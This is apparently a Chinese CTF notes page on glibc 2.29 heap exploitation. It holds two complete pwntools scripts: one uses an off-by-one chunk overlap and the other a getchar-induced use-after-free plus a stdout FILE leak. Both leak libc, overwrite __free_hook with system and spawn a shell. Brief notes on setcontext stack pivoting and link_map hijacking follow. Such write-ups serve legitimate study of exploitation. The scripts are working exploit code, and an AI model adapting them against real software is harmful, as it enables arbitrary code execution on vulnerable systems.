off by one ,可以修改size,形成chunk overlap。(好像没用到新保护机制)
#-*- coding:utf-8 -*-
from PwnContext import *
try:
from IPython import embed as ipy
except ImportError:
print ('IPython not installed.')
#context.terminal = ['tmux', 'splitw', '-h'] # uncomment this if you use tmux
# functions for quick script
s = lambda data :ctx.send(str(data))
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :ctx.recv(numb)
ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
irt = lambda :ctx.interactive()
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
debugg = 1
logg = 0
ctx.binary = './pwn2'
libc = ELF('/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/libc-2.29.so')
ctx.custom_lib_dir = '/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/'#remote libc
ctx.remote_libc = '/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/libc-2.29.so'
ctx.debug_remote_libc = True
ctx.symbols = {'lst':0x4060}
if debugg:
rs()
if logg:
context.log_level='debug'
def add(idx,sz,c):
sla('> ',1)
sla('idx:',idx)
sla('size:',sz)
sa('cnt:',c)
def free(idx):
sla('> ',2)
sla('idx:',idx)
def edit(idx,c):
sla('> ',3)
sla('idx:',idx)
sa('cnt:',c)
def show(idx):
sla('> ',4)
sla('idx:',idx)
def backdoor(c):
sla('> ',5)
sa('Because I know you are 666!',c)
add(1,0x88,'a'*0x88)
add(2,0x428,'a'*0x428)
add(0,0x80,'a'*0x80)
add(3,0x233,'a'*0x233)
add(4,0x428,'a'*0x428)
add(5,0x88,'/bin/sh\x00'+'\n')
edit(1,'a'*0x88+p16(0xb31))
free(3)
free(2)
add(6,0x428,'c'*16+'\n')
show(0)
lb = uu64(ru('\x7f',drop=False))-0x1e4ca0
fh = libc.sym['__free_hook']+lb
sys = libc.sym['system']+lb
success(hex(lb))
add(7,0x100,'a'*0x88+p64(0x241)+p64(fh)[:7]+'\n')
backdoor('b'*8)
backdoor(p64(sys))
free(5)
irt()
没有设置setbuf(stdin,0)缓冲区,利用getchar()申请malloc(0x1000)构成UAF的巧用。
#-*- coding:utf-8 -*-
from PwnContext import *
try:
from IPython import embed as ipy
except ImportError:
print ('IPython not installed.')
#context.terminal = ['tmux', 'splitw', '-h'] # uncomment this if you use tmux
# functions for quick script
s = lambda data :ctx.send(str(data))
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :ctx.recv(numb)
ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
irt = lambda :ctx.interactive()
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
debugg = 1
logg = 0
ctx.binary = './new_heap'
libc = ELF('/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/libc-2.29.so')
ctx.custom_lib_dir = '/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/'#remote libc
ctx.remote_libc = '/home/leo/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/libc-2.29.so'
ctx.debug_remote_libc = True
ctx.symbols = {'lst':0x202060}
if debugg:
rs()
if logg:
context.log_level='debug'
def add(sz,c):
sla('3.exit',1)
sla('size:',sz)
sa('content:',c)
def free(idx):
sla('3.exit',2)
sla('index:',idx)
ru('good present for African friends:')
low_heap = int(ru('\n',drop=True),16)
success(hex(low_heap))
add(0x78,'0')
add(0x78,'1')
add(0x78,'2')
add(0x78,'3')
add(0x78,'4')
add(0x78,'5')
add(0x78,'6')
add(0x78,'7')
for i in range(7):
free(i)
free(7)
sla('3.exit',3)#7
sl('a')#malloc(0x1000)
add(0x10,'8')#top chunk
free(7)
add(0x68,'9')
add(0x68,'10')
add(0x68,'11')
free(11)
free(10)
free(7)#free(7) or free(9)
sla('3.exit',3)#7
sla('sure?','a'*0x30)
fd = low_heap>>4<<12 | 0x730 #libc
sla('3.exit',3)#7
sa('sure?',p16(fd))
stdout = 0x1760
dbg()
ipy()
add(0x20,p16(stdout))
add(0x68,'13')#13
add(0x68,'14')#14
add(0x68,p64(0xfbad1800)+p64(0)*3+'\xc8')
lb = uu64(r(6))-0x1e4a00
success(hex(lb))
free(7)
fh = libc.sym['__free_hook']+lb
sys = libc.sym['system']+lb
success(hex(fh))
sla('3.exit',3)#7
sa('sure?',p64(fh))
sla('3.exit',3)#7
sa('sure?',p64(fh))
add(0x68,'/bin/sh\x00')#16
add(0x68,p64(sys))
free(16)
irt()
然而在我们控了free_hook以后,我们发现libc-2.29中没有可以利用rdi控制rsp进行迁栈的gadget,所以使用了其它方法。IO_wfile_sync
函数可以利用rdi控制rdx,函数setcontext+0x35
处可以用rdx控rsp,两个搭配使用就可以进行迁栈。在IO_wfile_sync+0x6d
处有call [r12+0x20]
,这里的r12也是可以用rdi控制的,所以可以利用这条指令调用setcontext+0x35
,实现free_hook -> IO_wfile_sync -> setcontext+0x35
。https://www.anquanke.com/post/id/210160
劫持link_map
1、smallbin attack 攻击global_max_fast
2、fastbin attack 劫持topchunk
3、伪造link_map结构,调用setcontext+0x3d
4、ROP
https://www.anquanke.com/post/id/211331